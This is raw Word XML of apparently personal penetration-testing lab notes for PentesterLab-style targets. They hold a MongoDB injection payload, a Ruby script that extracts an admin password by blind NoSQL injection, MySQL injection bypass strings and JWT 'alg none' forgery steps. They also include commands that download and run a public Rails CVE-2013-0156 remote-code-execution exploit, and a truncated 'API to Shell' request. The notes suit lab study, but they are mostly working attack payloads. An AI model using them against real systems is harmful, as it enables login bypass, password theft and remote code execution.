    <w:p w14:paraId="68276269" w14:textId="49F74AA8" w:rsidR="004C72ED" w:rsidRDefault="004C72ED" w:rsidP="00C2627A"/>
    <w:p w14:paraId="2EF7FA2E" w14:textId="6D577DF8" w:rsidR="004C72ED" w:rsidRDefault="004C72ED" w:rsidP="00C2627A">
      <w:r>
        <w:t>Openssl AES Decryption cmd:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50887DCA" w14:textId="2009EAE3" w:rsidR="004C72ED" w:rsidRDefault="004C72ED" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C72ED">
        <w:t xml:space="preserve">openssl enc -d -aes256 -k </w:t>
      </w:r>
      <w:r w:rsidRPr="00964087">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>P3NT35T3RL48</w:t>
      </w:r>
      <w:r w:rsidRPr="004C72ED">
        <w:t xml:space="preserve"> -in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00964087">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>backup.tgz.enc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004C72ED">
        <w:t xml:space="preserve"> -out </w:t>
      </w:r>
      <w:r w:rsidRPr="00964087">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>foo.tgz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3784C0C3" w14:textId="7AE3B873" w:rsidR="00FE3240" w:rsidRDefault="00FE3240" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D281C26" w14:textId="042498C9" w:rsidR="00FE3240" w:rsidRPr="0041760B" w:rsidRDefault="00FE3240" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041760B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mango db injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5538E318" w14:textId="2D54A346" w:rsidR="00FE3240" w:rsidRDefault="00FE3240" w:rsidP="00C2627A">
      <w:r>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>or</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 1==1 %00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23088E7F" w14:textId="2FD4A005" w:rsidR="00D36180" w:rsidRPr="00D36180" w:rsidRDefault="00D36180" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D36180">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ruby Script for string match on server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031CCE98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>require '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>httparty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032E5292" w14:textId="77777777" w:rsidR="00262242" w:rsidRPr="00262242" w:rsidRDefault="00262242" w:rsidP="00262242">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23226B1B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>URL="ptl-24abce9f-4eab8e70.libcurl.so"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A73C0E5" w14:textId="77777777" w:rsidR="00262242" w:rsidRPr="00262242" w:rsidRDefault="00262242" w:rsidP="00262242">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45BBFE70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>def check?(str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581CE23B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 xml:space="preserve">        resp=HTTParty.get("http://#{URL}/?search=admin%27%20%26%26%20this.password.match(/#{str}/)%00")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671FDF93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 xml:space="preserve">        return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>resp.body</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> =~ /&gt;admin&lt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD10B0E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>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA1ED35" w14:textId="77777777" w:rsidR="00262242" w:rsidRPr="00262242" w:rsidRDefault="00262242" w:rsidP="00262242">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0115CAEC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>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> check?("d").inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1669D8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>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> check?("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>aaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>").inspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E76075" w14:textId="77777777" w:rsidR="00262242" w:rsidRPr="00262242" w:rsidRDefault="00262242" w:rsidP="00262242">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416C3767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>CHARSET =('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>a'..'z</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>to_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>+('0'..'9').</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>to_a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>+['-']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F964E85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 xml:space="preserve">  password = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744F37EE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 xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2189CB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>while true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AFEC9E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ab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>CHARSET.each</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> do |c|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031521E6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ab/>
        <w:t>puts "Trying: #{c} for #{password}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC22661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ab/>
        <w:t xml:space="preserve">test = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>password+c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F474F6E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ab/>
        <w:t>if check?("^#{test}.*$")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBEE091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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>password+=c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB9D797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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>puts password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90AF8B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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
        <w:t>break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAB52B8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ab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069133EA" w14:textId="77777777" w:rsidR="00262242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ab/>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E36FB8" w14:textId="0B814E09" w:rsidR="00D36180" w:rsidRPr="00262242" w:rsidRDefault="00262242" w:rsidP="00262242">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00262242">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575AA7B1" w14:textId="6C69588E" w:rsidR="00D36180" w:rsidRDefault="00B324B6" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B324B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B324B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (if space and comment disabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207737B3" w14:textId="40310205" w:rsidR="00B324B6" w:rsidRDefault="00B324B6" w:rsidP="00C2627A">
      <w:r w:rsidRPr="00B324B6">
        <w:t>admin%27||1%3D1%23</w:t>
      </w:r>
      <w:r w:rsidR="00A951A8">
        <w:t xml:space="preserve"> – it is admin’||1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33275215" w14:textId="0684C86C" w:rsidR="008E1322" w:rsidRDefault="008E1322" w:rsidP="00C2627A"/>
    <w:p w14:paraId="2F099414" w14:textId="5EBFE5DD" w:rsidR="008E1322" w:rsidRDefault="008E1322" w:rsidP="00C2627A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> advance and rare instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E2356B" w14:textId="62DD7E5A" w:rsidR="008E1322" w:rsidRDefault="008E1322" w:rsidP="00C2627A">
      <w:r w:rsidRPr="008E1322">
        <w:t>admin%bf%27+or+1=1--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664527EC" w14:textId="061971CA" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A"/>
    <w:p w14:paraId="192EF8D3" w14:textId="6341391A" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t>JWT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58387808" w14:textId="1ADBACB2" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Header.string.sign</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="787CDFF5" w14:textId="5C5B4780" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t xml:space="preserve">-decode header, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and sign</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D2D450" w14:textId="63C31E6F" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t xml:space="preserve">- header – Change the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>alg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to none and user to admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D183B" w14:textId="4F736B4E" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r w:rsidRPr="00266444">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3496E9AD" wp14:editId="163D4038">
            <wp:extent cx="5943600" cy="144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6728" w14:textId="7FE9F91C" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r w:rsidRPr="00266444">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BBB5610" wp14:editId="5C09D2D4">
            <wp:extent cx="5943600" cy="1253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AF2B" w14:textId="3E637B7A" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t>Then decode individual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984D0F0" w14:textId="0783F88F" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t>Copy and after string add “.” And keep space to notify its sign less.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE34290" w14:textId="4461970E" w:rsidR="00266444" w:rsidRDefault="00266444" w:rsidP="00C2627A">
      <w:r>
        <w:t xml:space="preserve">Now use this </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jwt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to login as admin act.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EECDF9B" w14:textId="104B3040" w:rsidR="004D77A8" w:rsidRDefault="004D77A8" w:rsidP="00C2627A"/>
    <w:p w14:paraId="2F86D34E" w14:textId="626518D2" w:rsidR="004D77A8" w:rsidRDefault="004D77A8" w:rsidP="00C2627A"/>
    <w:p w14:paraId="16DD838D" w14:textId="77777777" w:rsidR="004D77A8" w:rsidRDefault="004D77A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76270D" w14:textId="4B0C6B66" w:rsidR="004D77A8" w:rsidRDefault="004D77A8" w:rsidP="00C2627A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D77A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CVE-2013-0156: Rails Object Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36810438" w14:textId="1ADEE14C" w:rsidR="004D77A8" w:rsidRDefault="00000000" w:rsidP="00C2627A">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B452E8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>gist.githubusercontent.com/postmodern/4499206/raw/a68d6ff8c1f9570a09365036aeb96f6a9fff7121/rails_rce.rb</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B452E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7375E71D" w14:textId="0D3040D2" w:rsidR="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00C2627A"/>
    <w:p w14:paraId="0F336061" w14:textId="1EEEA314" w:rsidR="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Open Kali and open root terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F2F5CE" w14:textId="0C543DEA" w:rsidR="00B452E8" w:rsidRPr="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker run -it ruby:2 /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D7E6D1" w14:textId="5DB66AEC" w:rsidR="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It will go into ruby docker mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A30B8D3" w14:textId="04F34627" w:rsidR="00B452E8" w:rsidRPr="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Fist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> install </w:t>
      </w:r>
      <w:r w:rsidRPr="00B452E8">
        <w:t>ronin-support</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and to do type </w:t>
      </w:r>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>gem install ronin-support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D6F3BA" w14:textId="40E50B06" w:rsidR="00B452E8" w:rsidRPr="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now create ruby script and use existing (open exploit). Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">curl https://gist.githubusercontent.com/postmodern/4499206/raw/a68d6ff8c1f9570a09365036aeb96f6a9fff7121/rails_rce.rb -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rails_rce.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0565BA12" w14:textId="77777777" w:rsidR="00B452E8" w:rsidRPr="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E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B452E8">
        <w:t>Type</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> below command to see If it is executing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D43DFE9" w14:textId="2A9FECDA" w:rsidR="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8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Pr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ruby </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>rails_rce.rb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> http://ptl-1949f704-5ffc05cb.libcurl.so/ "puts 'lol'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E3665" w14:textId="079B61B0" w:rsidR="00B452E8" w:rsidRDefault="00B452E8" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B452E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="065423A9" wp14:editId="5D2A9D99">
            <wp:extent cx="5943600" cy="1557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4E9D" w14:textId="5377C748" w:rsidR="00200972" w:rsidRDefault="00200972" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352504E0" w14:textId="6838D88B" w:rsidR="00200972" w:rsidRDefault="00200972" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67D83E29" w14:textId="09DA09B3" w:rsidR="00200972" w:rsidRDefault="00200972" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00200972">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>API to Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB2CCDB" w14:textId="4269A335" w:rsidR="00200972" w:rsidRDefault="00200972" w:rsidP="00B452E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF821EE" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>POST /file HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645ABB3E" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3A7F20" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Host: ptl-eea48f31-1180e6b3.libcurl.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CE1577" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="482BDC65" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>User-Agent: curl/7.85.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081A24D7" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55B2EC93" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Accept: */*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E03FED4" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2AB418" w14:textId="77777777" w:rsidR="007B10BA" w:rsidRPr="007B10BA" w:rsidRDefault="007B10BA" w:rsidP="007B10BA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B10BA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
